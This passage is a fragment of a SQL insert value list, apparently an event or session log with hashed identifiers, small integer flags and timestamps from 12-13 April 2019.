(77976, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:05:36'),
(77977, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:05:40'),
(77978, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:06:35'),
(77979, 'fc25d6936d45433d429908850cef41b7', 'e3253903040248a2', 0, 2, 1, '2019-04-12 01:07:07'),
(77980, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:07:22'),
(77981, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:07:58'),
(77982, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:08:02'),
(77983, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:08:58'),
(77984, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:09:03'),
(77985, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 01:11:35'),
(77986, '31f2b5a3d684c1e5fad1aba36342b3b6', 'd83be9192f556fc0', 0, 2, 1, '2019-04-12 01:11:55'),
(77987, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 01:12:12'),
(77988, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 01:12:26'),
(77989, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 01:13:31'),
(77990, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 01:17:47'),
(77991, '4a34d084ec8805e5cf8cc509cbaa82e1', 'fac983827c4e356b', 0, 2, 1, '2019-04-12 01:34:51'),
(77992, '7218e3b6c199c578091fa3b34a268eb4', '7fb4f6c9d8158457', 0, 2, 1, '2019-04-12 01:48:02'),
(77993, 'dd8f739c5f1a085c9eefc5780b58f4f2', 'b2e78912dacced42', 0, 2, 1, '2019-04-12 01:50:38'),
(77994, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 01:54:20'),
(77995, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 01:54:30'),
(77996, '7c58fa48b9070e6ce75a2f3549460120', 'a241b97c40d2b2c5', 0, 2, 1, '2019-04-12 01:59:02'),
(77997, '0611efdce43906d8b54ad176749a1faf', '27070036dca05be6', 0, 2, 1, '2019-04-12 02:03:19'),
(77998, '0611efdce43906d8b54ad176749a1faf', '27070036dca05be6', 0, 2, 1, '2019-04-12 02:03:33'),
(77999, '0611efdce43906d8b54ad176749a1faf', '27070036dca05be6', 0, 2, 1, '2019-04-12 02:03:51'),
(78000, '0611efdce43906d8b54ad176749a1faf', '27070036dca05be6', 0, 2, 1, '2019-04-12 02:04:02'),
(78001, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:09:24'),
(78002, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:09:36'),
(78003, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:09:42'),
(78004, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:09:42'),
(78005, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:09:57'),
(78006, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:09:59'),
(78007, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:10:07'),
(78008, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:10:18'),
(78009, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:10:18'),
(78010, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:10:26'),
(78011, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:10:34'),
(78012, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:10:37'),
(78013, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:10:42'),
(78014, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:10:44'),
(78015, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:11:01'),
(78016, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:11:09'),
(78017, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:11:17'),
(78018, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:11:28'),
(78019, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:11:43'),
(78020, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:11:47'),
(78021, 'e1d071c6e4de36b52377f4c9c9d5eb5c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-12 02:11:53'),
(78022, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:12:01'),
(78023, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:12:07'),
(78024, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 02:12:09'),
(78025, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:12:16'),
(78026, '2a55ea7992888eca16154a045c35ea69', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:12:36'),
(78027, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:12:36'),
(78028, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:12:54'),
(78029, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:13:01'),
(78030, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:13:06'),
(78031, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:13:23'),
(78032, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:13:23'),
(78033, '53a1cc7d0af166368d571a2369972838', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:13:28'),
(78034, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:13:32'),
(78035, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:14:04'),
(78036, '53a1cc7d0af166368d571a2369972838', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:14:07'),
(78037, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:14:26'),
(78038, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:14:40'),
(78039, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:15:07'),
(78040, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:15:11'),
(78041, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-12 02:15:35'),
(78042, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-12 02:15:48'),
(78043, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:16:26'),
(78044, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:17:11'),
(78045, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 02:17:38'),
(78046, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:18:31'),
(78047, '53a1cc7d0af166368d571a2369972838', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 02:19:12'),
(78048, '3587128b2d8351c6cdf5e6cf0c90e38f', 'c210f1631757ebe5', 0, 2, 1, '2019-04-12 02:19:13'),
(78049, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-12 02:20:39'),
(78050, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-12 02:22:12'),
(78051, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-12 02:22:27'),
(78052, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-12 02:23:45'),
(78053, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-12 02:31:18'),
(78054, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-12 02:31:55'),
(78055, '6aabeed7977e51165f8781f4480c7e29', 'cfe273617e06dd89', 0, 2, 1, '2019-04-12 02:37:16'),
(78056, '1ca05eb3751f9597558cc0ba2be5c20d', 'b0d8f30309f0c8fb', 0, 2, 1, '2019-04-12 03:05:11'),
(78057, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:37:01'),
(78058, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:37:28'),
(78059, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:37:43'),
(78060, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:37:57'),
(78061, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:38:17'),
(78062, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:38:29'),
(78063, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:38:52'),
(78064, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:39:44'),
(78065, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:40:05'),
(78066, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:40:08'),
(78067, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:41:33'),
(78068, 'bc5e45378a94c8c99e44eb70c26ea624', '93d465423f48486d', 0, 2, 1, '2019-04-12 03:41:57'),
(78069, 'b63b6fc56b0cb654bd1e6167d0371a57', 'b2e78912dacced42', 0, 2, 1, '2019-04-12 03:43:13'),
(78070, '1f4733210b8840306fcb044d7d6f23ce', '0efc0c270ec364b3', 0, 2, 1, '2019-04-12 05:11:30'),
(78071, 'c3d4620985b8d68c93fffd905e297353', '3cfca37777c71b51', 0, 2, 1, '2019-04-12 05:44:01'),
(78072, 'c3d4620985b8d68c93fffd905e297353', '3cfca37777c71b51', 0, 2, 1, '2019-04-12 05:46:38'),
(78073, '3ceb51c8ebc22a8cc6ea665c44e3f4fd', '3d1dceaf0c765f9c', 0, 2, 1, '2019-04-12 06:34:45'),
(78074, 'cddb752bbf9f0515375f318fcb64bea0', 'ed7a9749e0689b64', 0, 2, 1, '2019-04-12 07:26:59'),
(78075, '59dd12dd073a50074a9b34ba5ecf8776', '8d0ce8d2f494ec99', 0, 2, 1, '2019-04-12 07:41:23'),
(78076, '83952451f9b21ffce4c3ea75105743fb', '5a98505f0172f8f5', 0, 2, 1, '2019-04-12 07:56:39'),
(78077, 'bd47aca29097f5ecb3db52934637c4e4', '1f12b40a164d3a3c', 0, 2, 1, '2019-04-12 08:04:53'),
(78078, 'bd47aca29097f5ecb3db52934637c4e4', '1f12b40a164d3a3c', 0, 2, 1, '2019-04-12 08:08:40'),
(78079, '99d64f4dc038ebfd78a63d8a10c3b58e', '165a61d84a5fddd0', 0, 2, 1, '2019-04-12 08:43:19'),
(78080, 'f5e75dfcfc99e11b8441c89947b50ab8', 'fd282d92e13df97a', 0, 2, 1, '2019-04-12 08:44:26'),
(78081, 'f24bc79703775d4eb0f65b7bf5a72295', '5d858fa8bb3068cc', 0, 2, 1, '2019-04-12 09:07:44'),
(78082, 'ccb3d3e62313107fed1a13803f2ba02d', 'e51891ee53e8de58', 0, 2, 1, '2019-04-12 09:31:17'),
(78083, '7e0c0eaa986f707ed91c27163762e5ab', '196ae7616c94df27', 0, 2, 1, '2019-04-12 10:04:07'),
(78084, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-04-12 10:29:34'),
(78085, '1bca9d16d88c2c8c99de11b851479133', 'd7036fef56eff751', 0, 2, 1, '2019-04-12 10:34:21'),
(78086, '7d6b06c777326bb94cf75fee8eb59803', 'bfed2012f16ead79', 0, 2, 1, '2019-04-12 11:02:49'),
(78087, '7d6b06c777326bb94cf75fee8eb59803', 'bfed2012f16ead79', 0, 2, 1, '2019-04-12 11:07:04'),
(78088, '3870da0fd0db1eb6dd35f942d1563e87', '7edff10c327f64f4', 0, 2, 1, '2019-04-12 11:37:31'),
(78089, '3870da0fd0db1eb6dd35f942d1563e87', '7edff10c327f64f4', 0, 2, 1, '2019-04-12 11:37:45'),
(78090, '7d6b06c777326bb94cf75fee8eb59803', 'bfed2012f16ead79', 0, 2, 1, '2019-04-12 11:41:15'),
(78091, 'd7343b0524aac22e3c8337c405302b1e', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-12 11:45:43'),
(78092, '8da8a748fb3ccb910fe3ff4cfe996887', 'b2d25c8f054bf5a8', 0, 2, 1, '2019-04-12 12:51:01'),
(78093, '8da8a748fb3ccb910fe3ff4cfe996887', 'b2d25c8f054bf5a8', 0, 2, 1, '2019-04-12 13:20:00'),
(78094, '7f78c6beeb1d87b852bc51c9804643f8', '9e0a6d4619def9da', 0, 2, 1, '2019-04-12 13:31:42'),
(78095, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 14:55:54'),
(78096, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 14:59:52'),
(78097, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:01:18'),
(78098, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:01:22'),
(78099, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:01:29'),
(78100, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:02:06'),
(78101, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:02:25'),
(78102, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:02:53'),
(78103, '6182d8d918e92c5bafa75bf199b7274f', '6b4c2d8b77298bfe', 0, 2, 1, '2019-04-12 15:03:03'),
(78104, '60099d9d3f8b6cb59f105ea4a652651b', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-12 15:14:40'),
(78105, '210e108fe69391b2c9b612559cd294fc', 'b86813d2ae44bfd7', 0, 2, 1, '2019-04-12 15:24:07'),
(78106, 'aa82484f874fc2a17c3a0fb4f9c435f4', '41d2895ee6c46cc8', 0, 2, 1, '2019-04-12 16:37:39'),
(78107, 'ea0fe2034bf162040e6cf004f19d4fe5', '775d263ffcc36060', 0, 2, 1, '2019-04-12 16:56:00'),
(78108, '439f1c67c3fb9db206c5fd1ba89e176f', 'd2ee9139b79a6552', 0, 2, 1, '2019-04-12 17:45:38'),
(78109, 'e9fca42132c992749d3e8444cecc1224', 'f8f201f9c3ec763f', 0, 2, 1, '2019-04-12 17:50:51'),
(78110, '98af6a84932eab33b745a66444d5a895', '4ddff2417d67b0a2', 0, 2, 1, '2019-04-12 18:26:02'),
(78111, '5326000d9f0de9c8c3be12185a33b035', '78c5e5651bdc37de', 0, 2, 1, '2019-04-12 18:27:35'),
(78112, '5326000d9f0de9c8c3be12185a33b035', '78c5e5651bdc37de', 0, 2, 1, '2019-04-12 18:28:59'),
(78113, '98af6a84932eab33b745a66444d5a895', '4ddff2417d67b0a2', 0, 2, 1, '2019-04-12 18:33:39'),
(78114, '60099d9d3f8b6cb59f105ea4a652651b', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-12 19:16:55'),
(78115, 'a8a7450866ec8032b653a9cabeedc6a2', 'bebf43d55eca48f2', 0, 2, 1, '2019-04-12 20:06:41'),
(78116, 'd513eb7ee1382f8504dfeec57ddafcc0', '4ddff2417d67b0a2', 0, 2, 1, '2019-04-12 20:44:21'),
(78117, 'f9e54c03428a0933b797e6cc1ac2c6cb', 'e93773977d907ff0', 0, 2, 1, '2019-04-12 21:01:00'),
(78118, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:10:39'),
(78119, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:12:20'),
(78120, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:14:34'),
(78121, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:15:03'),
(78122, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:15:26'),
(78123, '60b12297925ac6bb08d0c60072dd9b02', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 21:15:39'),
(78124, '60b12297925ac6bb08d0c60072dd9b02', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 21:15:49'),
(78125, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:16:41'),
(78126, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:16:57'),
(78127, '60b12297925ac6bb08d0c60072dd9b02', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 21:17:01'),
(78128, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:17:16'),
(78129, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:17:27'),
(78130, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:17:57'),
(78131, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:18:10'),
(78132, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:18:20'),
(78133, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:18:34'),
(78134, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 21:18:46'),
(78135, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:19:21'),
(78136, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:19:33'),
(78137, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:19:39'),
(78138, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:19:59'),
(78139, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:20:09'),
(78140, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 21:22:55'),
(78141, 'a6ba9bdd59a5fc35099191b1c919f855', '9a903552e28cf43c', 0, 2, 1, '2019-04-12 21:23:17'),
(78142, 'a6ba9bdd59a5fc35099191b1c919f855', '9a903552e28cf43c', 0, 2, 1, '2019-04-12 21:23:50'),
(78143, '60b12297925ac6bb08d0c60072dd9b02', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 21:23:53'),
(78144, '60b12297925ac6bb08d0c60072dd9b02', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 21:24:23'),
(78145, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:26:26'),
(78146, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:26:36'),
(78147, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:26:54'),
(78148, '22e996592f27000868189b13bc0add10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-12 21:27:45'),
(78149, '22e996592f27000868189b13bc0add10', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-12 21:29:55'),
(78150, 'cd03afa3af49870fc35de1cb3cb57a24', '28c2a96de30e7664', 0, 2, 1, '2019-04-12 21:33:24'),
(78151, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:34:09'),
(78152, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 21:35:00'),
(78153, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:35:07'),
(78154, '60b12297925ac6bb08d0c60072dd9b02', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 21:35:09'),
(78155, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:36:12'),
(78156, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:36:49'),
(78157, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:37:14'),
(78158, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 21:37:35'),
(78159, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 21:37:39'),
(78160, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:37:47'),
(78161, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:39:33'),
(78162, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 21:39:56'),
(78163, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 21:40:27'),
(78164, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:43:36'),
(78165, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:47:42'),
(78166, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:48:17'),
(78167, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:48:41'),
(78168, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:50:27'),
(78169, '79edcaa9f437dac677185b015779a513', 'd53a1e82bf0b9288', 0, 2, 1, '2019-04-12 21:52:28'),
(78170, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 21:55:02'),
(78171, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 21:55:31'),
(78172, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-12 21:56:03'),
(78173, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 21:56:18'),
(78174, 'c07150dda37d136523b1f1bc605d26e8', '175b72b9380c40ec', 0, 2, 1, '2019-04-12 21:58:44'),
(78175, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 22:01:34'),
(78176, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 22:03:35'),
(78177, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 22:08:38'),
(78178, '3c02c1539e9d0f073b84a3f0032929c0', '2ec409a24006a669', 0, 2, 1, '2019-04-12 22:08:50'),
(78179, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 22:15:58'),
(78180, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 22:18:32'),
(78181, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-04-12 22:23:19'),
(78182, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-04-12 22:24:13'),
(78183, 'cf2329ba31df2867596c742b1a426973', 'b0ad8f47193c9db4', 0, 2, 1, '2019-04-12 22:29:42'),
(78184, 'e4eb7e4bf0763aea55d31f3f96254d97', '88a68bc2ffc4b1a9', 0, 2, 1, '2019-04-12 22:31:23'),
(78185, '9eec805496dc0c7b6a3fce7b1780d15d', 'b38f4ef63ba3f0dc', 0, 2, 1, '2019-04-12 22:35:47'),
(78186, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 22:36:09'),
(78187, 'dfbd07bb1d4d673b8a7c5164f0598356', 'b0f65a65ff17466b', 0, 2, 1, '2019-04-12 22:49:11'),
(78188, '106fa77806271e23c48ab536bc8d3eab', '80715baefaecdd70', 0, 2, 1, '2019-04-12 22:52:02'),
(78189, 'dfbd07bb1d4d673b8a7c5164f0598356', 'b0f65a65ff17466b', 0, 2, 1, '2019-04-12 22:52:09'),
(78190, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 22:55:02'),
(78191, '106fa77806271e23c48ab536bc8d3eab', '80715baefaecdd70', 0, 2, 1, '2019-04-12 22:55:16'),
(78192, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-12 22:55:25'),
(78193, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 22:55:44'),
(78194, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-12 22:57:32'),
(78195, '315510898bcce90b136f5da8e6478ece', 'cad202a09758cb3a', 0, 2, 1, '2019-04-12 22:59:04'),
(78196, 'd35705e380bb700f02fab79a8b4e60e7', '20683e7ff6f02d30', 0, 2, 1, '2019-04-12 23:06:01'),
(78197, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 23:06:32'),
(78198, '14027f398985ca40a0ec99113476a491', 'c92ad5d17c79bb5b', 0, 2, 1, '2019-04-12 23:06:36'),
(78199, '97ad6c5ea18f057a36aa2aafef89010f', 'e696295cb4f4750d', 0, 2, 1, '2019-04-12 23:18:48'),
(78200, '53361fd66b2b7d2c5a838a3242a00273', '0e648495ff86ba16', 0, 2, 1, '2019-04-12 23:52:54'),
(78201, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:27:30'),
(78202, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:27:53'),
(78203, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:28:10'),
(78204, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-13 00:28:26'),
